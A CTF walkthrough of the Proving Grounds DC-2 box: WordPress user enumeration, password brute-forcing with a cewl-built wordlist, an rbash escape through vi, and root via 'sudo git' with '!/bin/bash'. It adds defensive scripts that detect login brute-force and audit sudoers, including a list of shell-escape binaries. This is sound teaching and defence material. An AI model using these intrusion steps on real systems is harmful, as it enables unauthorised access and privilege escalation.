Security Analyst | Security Researcher | CRTP

Proving Grounds Play: DC-2

Proving Grounds Play - DC-2 CTF writeup.

Nmap

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52517b6e70a4337ad24be10b5a0f9ed7 (DSA)
|   2048 5911d8af38518f41a744b32803809942 (RSA)
|   256 df181d7426cec14f6f2fc12654315191 (ECDSA)
|_  256 d9385f997c0d647e1d46f6e97cc63717 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add an entry to /etc/hosts on the attacking machine mapping the target's IP to dc-2, since the web server redirects to http://dc-2/ (see the http-title line above).

Web PORT: 80


Tech stack

  • WordPress

WPscan

wpscan --url $URL --disable-tls-checks --enumerate p --enumerate t --enumerate u

Usernames Enumerated

admin
jerry
tom

Hint

As hinted on the web page, the wordlist has to be generated from the site's own content using the tool cewl:

cewl http://dc-2/ > password

Brute-force credentials using WPScan (the users file holds the three usernames enumerated above):

wpscan --url http://dc-2/ -U users -P password
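From the defender's side, the brute-force step above leaves an obvious trace in the web server log: a burst of POST requests to wp-login.php (or xmlrpc.php, which WPScan can also use) from a single client. The script below is an added example, not part of the original writeup: it parses Apache combined-format access log lines and flags any client that exceeds a threshold of login POSTs inside a sliding time window. The log lines, the threshold and window defaults, and the user-agent strings are all constructed here for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format (the default on Debian's Apache 2.4, as seen on DC-2).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# WPScan's password attack posts to wp-login.php by default, or to xmlrpc.php.
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")

def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def detect_login_bruteforce(lines, threshold=5, window_seconds=60):
    """Map client IP -> largest number of login POSTs seen inside any window of
    window_seconds, for clients that reach the threshold."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        path = rec["path"].split("?", 1)[0]
        if path in LOGIN_PATHS:
            posts[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, stamps in posts.items():
        stamps.sort()
        start, best = 0, 0
        for end, ts in enumerate(stamps):
            # Slide the window start forward until it spans at most window_seconds.
            while (ts - stamps[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged

# Constructed sample: one client hammering wp-login.php, one normal login.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Mar/2024:14:01:00 +0000] "GET /wp-login.php HTTP/1.1" 200 5120 "-" "WPScan v3.8.22"',
    '10.0.0.5 - - [10/Mar/2024:14:01:01 +0000] "POST /wp-login.php HTTP/1.1" 200 5120 "http://dc-2/wp-login.php" "WPScan v3.8.22"',
    '10.0.0.5 - - [10/Mar/2024:14:01:02 +0000] "POST /wp-login.php HTTP/1.1" 200 5120 "http://dc-2/wp-login.php" "WPScan v3.8.22"',
    '10.0.0.5 - - [10/Mar/2024:14:01:03 +0000] "POST /wp-login.php HTTP/1.1" 200 5120 "http://dc-2/wp-login.php" "WPScan v3.8.22"',
    '10.0.0.5 - - [10/Mar/2024:14:01:05 +0000] "POST /wp-login.php HTTP/1.1" 200 5120 "http://dc-2/wp-login.php" "WPScan v3.8.22"',
    '10.0.0.5 - - [10/Mar/2024:14:01:08 +0000] "POST /wp-login.php HTTP/1.1" 200 5120 "http://dc-2/wp-login.php" "WPScan v3.8.22"',
    '10.0.0.5 - - [10/Mar/2024:14:01:12 +0000] "POST /wp-login.php HTTP/1.1" 200 5120 "http://dc-2/wp-login.php" "WPScan v3.8.22"',
    '10.0.0.5 - - [10/Mar/2024:14:01:15 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://dc-2/wp-login.php" "WPScan v3.8.22"',
    '10.0.0.9 - - [10/Mar/2024:14:02:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://dc-2/wp-login.php" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Mar/2024:14:02:31 +0000] "GET /wp-admin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, n in detect_login_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {n} login POSTs inside 60s")
```

Counting POSTs rather than failed status codes matters because WordPress answers a failed login with 200 and a successful one with 302, so a status-only rule would miss the attempt that finally succeeds. The same sliding-window count can drive a fail2ban-style block or an alert; the ten-second window in the test shows that the threshold and window together decide how noisy the rule is.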

Credentials Obtained


SSH to the machine (port 7744) using the credentials. The user jerry doesn't have SSH login permission, so log in as tom.

Escaping rbash

vi
:set shell=/bin/bash
:shell

Type the above commands inside vi to escape from rbash to a standard Unix shell.

User tom may not run anything as sudo on DC-2, so switch to user jerry.


User jerry can run /usr/bin/git as sudo.

Search for the binary on GTFOBins. As that page shows, git can be used to escalate privileges via sudo with the commands below.


sudo git -p help config

# Once the git manual page appears, type the line below and press Enter
!/bin/bash
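Both escalation steps above (vi's :shell escape out of rbash, and sudo git dropping into a shell from its pager) come down to the same defensive question: which commands reachable by a given user can spawn an interactive shell? The script below is an added example, not code from the writeup, that audits /etc/passwd and sudoers content for exactly that. SHELL_ESCAPE_BINS is a small constructed subset of what GTFOBins documents, the allowed_bins mapping is assumed to be collected separately from each rbash user's PATH, and the sample passwd and sudoers content is constructed, modelled loosely on the DC-2 box.

```python
import os
import re

# Commands that can drop to an interactive shell (vi's ":shell", git's pager, and so on).
# Constructed subset of what GTFOBins documents; extend it before real use.
SHELL_ESCAPE_BINS = {
    "git", "vi", "vim", "less", "more", "man", "find", "awk", "perl",
    "python", "python3", "nmap", "env", "bash", "sh", "tar",
}

RESTRICTED_SHELLS = {"/bin/rbash", "/usr/bin/rbash"}

def audit_restricted_shells(passwd_text, allowed_bins):
    """passwd_text: contents of /etc/passwd. allowed_bins: {user: [command names in that
    user's restricted PATH]} (assumed collected separately). Returns {user: [...]} listing
    rbash users who can still reach a shell-capable command."""
    findings = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or fields[6] not in RESTRICTED_SHELLS:
            continue
        user = fields[0]
        risky = sorted(set(allowed_bins.get(user, [])) & SHELL_ESCAPE_BINS)
        if risky:
            findings[user] = risky
    return findings

# One sudoers user specification: who host=(runas) TAGS: cmd1, cmd2
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")

def audit_sudoers(text):
    """Return findings for rules that grant ALL or a shell-capable command."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments (and #include lines)
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            base = os.path.basename(cmd.split()[0])
            reason = None
            if cmd == "ALL":
                reason = "unrestricted ALL"
            elif base in SHELL_ESCAPE_BINS:
                reason = f"{base} can spawn a shell"
            if reason:
                findings.append({"who": m.group("who"), "command": cmd,
                                 "nopasswd": nopasswd, "reason": reason})
    return findings

# Constructed sample data, modelled loosely on the DC-2 box.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
tom:x:1001:1001::/home/tom:/bin/rbash
jerry:x:1002:1002::/home/jerry:/bin/bash
"""
SAMPLE_ALLOWED = {"tom": ["ls", "less", "scp", "vi"]}
SAMPLE_SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
jerry    ALL=(root) NOPASSWD: /usr/bin/git
www-data ALL=(root) /usr/sbin/service apache2 restart
backup   ALL=(root) /usr/bin/date, /bin/tar
"""

if __name__ == "__main__":
    print(audit_restricted_shells(SAMPLE_PASSWD, SAMPLE_ALLOWED))
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f)
```

The sudoers check flags the rule that let jerry reach root here; the remediation is to not grant git (or any other GTFOBins-listed binary) to an unprivileged user, rather than trying to restrict its arguments, because the shell escape comes from the pager git invokes, not from any particular argument. The rbash check makes the matching point for tom: a restricted shell is only as strong as the set of commands reachable from it, and an editor in that set defeats it.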

Root Shell Obtained


Thanks for reading!

For more updates and insights, follow me on Twitter: @thevillagehacker.